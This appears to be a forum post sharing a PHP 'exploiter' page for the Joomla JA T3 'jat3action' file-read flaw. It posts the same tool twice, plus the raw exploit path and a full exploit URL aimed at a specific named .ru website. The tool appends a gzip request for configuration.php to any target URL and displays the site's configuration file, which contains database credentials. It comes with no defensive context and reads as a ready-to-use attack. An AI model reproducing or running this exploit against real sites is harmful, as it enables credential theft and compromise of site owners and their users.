[align=center]
[/align]
online demo :
jat3action Exploiter
[php]
<head>
<title>exploit joomla jat3action</title>
<style type="text/css">
.auto-style1 {
text-align: center;
}
</style>
</head>
<form method='POST'>
<div class="auto-style1">
<input name='target' type='text' value='http://victim.com' style="border: thin dotted #FF0000; width: 414px;" ><br><br />
<?php
$target = $_POST['target'];
$exploit = '/index.php?jat3action=gzip&type=css&file=configurat ion.php';
$Bug = ($target).($exploit);
$get = @file_get_contents($Bug);
if($get){
echo "<textarea rows='26' cols='52' name='dns'>$get</textarea>";
}else{
echo "<textarea rows='26' cols='52' name='dns'>$get</textarea>";
}
?>
<br /><br>
<input type='submit' value='Get The Configuration File' style="width: 179px"></div>
</form>
<div class="auto-style1">
<br />
</div>
[/php]
[/align]
کد:
index.php?jat3action=gzip&type=js&file=configuration.php&v=1
کد:
http://britanskie-kotiki.ru/index.php?jat3action=gzip&type=js&file=configuration.php&v=1
[php]
<head>
<title>exploit joomla jat3action</title>
<style type="text/css">
.auto-style1 {
text-align: center;
}
</style>
</head>
<form method='POST'>
<div class="auto-style1">
<input name='target' type='text' value='http://victim.com' style="border: thin dotted #FF0000; width: 414px;" ><br><br />
<?php
$target = $_POST['target'];
$exploit = '/index.php?jat3action=gzip&type=css&file=configurat ion.php';
$Bug = ($target).($exploit);
$get = @file_get_contents($Bug);
if($get){
echo "<textarea rows='26' cols='52' name='dns'>$get</textarea>";
}else{
echo "<textarea rows='26' cols='52' name='dns'>$get</textarea>";
}
?>
<br /><br>
<input type='submit' value='Get The Configuration File' style="width: 179px"></div>
</form>
<div class="auto-style1">
<br />
</div>
[/php]